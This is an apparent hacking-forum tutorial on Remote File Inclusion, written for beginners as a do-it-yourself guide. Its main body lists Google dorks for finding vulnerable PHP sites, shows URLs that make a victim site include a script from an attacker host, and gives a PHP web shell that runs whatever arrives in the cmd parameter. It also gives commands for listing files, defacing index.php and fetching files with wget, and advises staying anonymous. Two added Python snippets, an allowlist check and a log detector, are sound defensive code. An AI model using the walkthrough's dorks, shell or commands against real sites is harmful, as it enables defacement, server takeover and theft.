Remote File Inclusion
Ever heard of RFI? Well, this is the guide on how to do it!
Introduction
RFI stands for Remote File Inclusion. It lets an attacker make a website or server load and run a custom-coded or malicious file hosted elsewhere, by feeding its address to one of the site's own scripts. The vulnerability exploits poor validation of user input in the site's code and can eventually lead to code execution on the server, or code execution in visitors' browsers (an XSS attack using JavaScript).
Whoa there buddy, that was pretty technical. If you didn't understand that, either because you're new to hacking or a script kiddie, calm down. Put in the simplest of terms, we can use this method to deface a website. Yay! Script kiddies rejoice!
Now, before you go all "get back to the SQLI" on me, let me just say, RFI is an EXTREMELY common exploit. In fact, it's definitely as popular as SQLI, it's just a whole lot less famous. If anything, RFI is actually easier than SQLI, and if you follow this tutorial, it really doesn't require much skill at all.
Using RFI you can deface a website, steal sensitive information, get access to the server, and really have your way with it.
Without further ado, let's begin.
What You Need to Know
It's not required, but highly suggested, to have some hacking experience. I know I said it was "easier than SQLI", but that's only half true. Once you become a good hacker, you'll find RFI to be insanely simple (and super fun/easy); however, in some ways it is a bit more complex and involved (as far as programming goes).
With this tutorial it won't be hard to follow along, but you will need to pay attention.
It is also likely you'll want some experience using a computer, and some experience programming. By the way, when I say "programming", I mean everything from markup to scripting to assembly.
For RFI, it can be helpful to know HTML, Bash, and especially PHP. You can learn most of them easily online.
D.I.Y. Tutorial
This is a D.I.Y. (do it yourself) tutorial, meaning that after reading this tutorial, or just following along with it, you will be ready to perform this exploit. I would highly suggest that you completely read and understand the entire tutorial prior to beginning.
Remember, if you are actually performing RFI, use a proxy and protect your identity - stay anonymous. Also, please read the disclaimer before beginning.
The first step is to find a vulnerable website. You can do this very quickly and easily by using Google dorks.
Here are five dorks to get you started (each on its own line); however, there are literally thousands more.
Code:
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
If you don't know how to use Google dorks, you really had better learn, as they're vital to any form of hacking (and even just to using Google effectively). There's no sense in reinventing the wheel in this tutorial.
Okay, let's assume that we have successfully located an exploitable website (a website vulnerable to RFI).
For now, we'll call our victim site (the site we are exploiting) "http://victimsite.com/" and our own site (the hacker's site) "http://hackersite.com/".
So, let's say we have our website:
Code:
http://victimsite.com/index.php?page=home
Let's check it out...
Code:
http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt
We can actually break this down into three parts, for clarity purposes:
http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt
The first part, http://victimsite.com/index.php?page=, is the victim's original site. This is the exploitable site that we found through Google dorks.
The second part, http://hackersite.com/, is our site, or the "hacker's site". This is a site owned/controlled by a hacker.
And finally, badscript.txt is the "bad script", the malicious script we'll be including in our attack. badscript.txt is the Remote File in Remote File Inclusion, and the whole URL makes up the inclusion process.
Now, if it truly is a vulnerable website, one of three cases will happen:
- Case 1 - You might have noticed that the original URL, "page=home", had no extension, but I have included an extension in my URL, so the site may give an error like "failure to include badscript.txt.txt". This can happen because the site may be automatically adding the .txt extension to the pages stored on the server.
- Case 2 - In this case, the site automatically appends something along the lines of .php, so we have to use a null byte in order to avoid the error.
- Case 3 - Successful execution - you hacked it.
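For the defender reading this, the flaw on the victim side is that index.php turns the raw page parameter into the path it includes. The following added example (not code from the original post) shows, in Python so it runs stand-alone, the check a PHP handler should make instead: map the parameter through a fixed allowlist and refuse everything else, including the remote-URL and null-byte variants from the cases above; the allowlist, file names and directory are constructed for the demo. On the PHP side, leaving allow_url_include=Off in php.ini also blocks remote includes server-wide.

```python
import os
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist: request value -> file under the templates directory.
# Only these names are ever turned into a path; the raw parameter never is.
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}
TEMPLATE_DIR = "/var/www/app/pages"   # constructed path for the demo


def classify(page: str) -> str:
    """Say why a page value is refused, or 'ok'; handy for logging the attempt."""
    if "\x00" in page:
        return "null-byte"          # case 2 above: truncating an appended extension
    try:
        scheme = urlsplit(page).scheme
    except ValueError:              # malformed URL (e.g. unbalanced IPv6 brackets): refuse too
        return "remote-url"
    if scheme:
        return "remote-url"         # http://, https://, ftp://, php://, data:// ...
    if "/" in page or "\\" in page or ".." in page:
        return "path-traversal"     # local file inclusion via directory climbing
    if page not in PAGES:
        return "not-in-allowlist"   # unknown name, even if a file by that name exists
    return "ok"


def resolve_page(page: str) -> Optional[str]:
    """Return the file to include for ``page``, or None to refuse the request.

    The path comes from the allowlist entry, not from the request, so an
    attacker's URL or file name is never handed to include().
    """
    if classify(page) != "ok":
        return None
    return os.path.join(TEMPLATE_DIR, PAGES[page])


if __name__ == "__main__":
    for value in ("home", "http://hackersite.com/badscript.txt",
                  "home\x00", "../../etc/passwd", "admin"):
        print(f"{value!r:45} -> {classify(value)}")
```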
Now, once you have battled your way around this one, you might want to learn what to code inside the script. You may get a custom-coded version of the infamous C99 script (too bloated, but highly effective once deployed) or you might code yourself a new one. For this, knowledge of PHP might come in handy.
Examine the code below:
Code:
<?php
// Pops a JavaScript alert in the browser of whoever loads the page
echo "<script>alert('U 4r3 0wn3d !!');</script>";
// Shows the cmd parameter, then hands it straight to the server's shell
echo "Run command: " . htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>
So, if you are in luck and it worked, let's try out some Linux commands. For example, to find the current working directory of the server and then list its files, we will be using the "pwd" and "ls" commands.
Code:
http://victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript
http://victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
Code:
cmd=echo HACKED> index.php
Want to download stuff? Try the "wget" command ("cmd=wget..." - get the idea?). Want to move it somewhere? Try the "mv" command.
The rest is up to your own brilliant mind.
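On the monitoring side, every step of this walkthrough leaves a distinctive request in the web server's access log. The following added example (not part of the original post) scans constructed combined-format log lines for an include-style parameter carrying a URL, a null byte or directory traversal, and for the cmd parameter chained onto it; the parameter names watched and the sample lines are assumptions made for the demo.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

INCLUDE_PARAMS = {"page", "file", "include", "path"}     # assumed parameter names to watch
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)    # http://, ftp://, php://, data:// ...
# Combined log format: client, ident, user, [time], "METHOD path PROTO", status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines modelled on the tutorial's URLs (documentation IPs, no real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http://hackersite.com/badscript.txt HTTP/1.1" 200 88
203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?cmd=ls&page=http://hackersite.com/ourscript HTTP/1.1" 200 913
203.0.113.9 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=about%00 HTTP/1.1" 500 0
198.51.100.2 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 480
"""


def inspect_request(path: str) -> List[str]:
    """Return findings for one request path; an empty list means nothing suspicious."""
    findings = []
    # parse_qs percent-decodes values, so %00 arrives here as a real NUL byte
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            if name in INCLUDE_PARAMS:
                if SCHEME_RE.match(value):
                    findings.append(f"{name}=remote-url")      # the page=http://... pattern
                if "\x00" in value:
                    findings.append(f"{name}=null-byte")       # case 2: truncating the appended .php
                if ".." in value:
                    findings.append(f"{name}=traversal")
            if name == "cmd":
                findings.append("cmd-parameter")               # command relayed to the included script
    return findings


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (client_ip, request_path, findings) for each suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                           # not a combined-format line
        ip, _ts, _method, path, _status = m.groups()
        findings = inspect_request(path)
        if findings:
            hits.append((ip, path, findings))
    return hits
```

Running scan_log(SAMPLE_LOG) reports the three requests from 203.0.113.9 and leaves the two ordinary page loads alone.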
Disclaimer
RFI (remote file inclusion) is a form of illegal hacking. It is illegal to gain entry to websites without proper permission from the owner of the website and web server. Any hacking techniques in this thread are for educational purposes only. I do not support or partake in illegal hacking. I am not responsible for your actions (or the actions of others). I am not responsible for the consequences of your actions (or the consequences of others). I am not accountable/responsible for how you use this guide.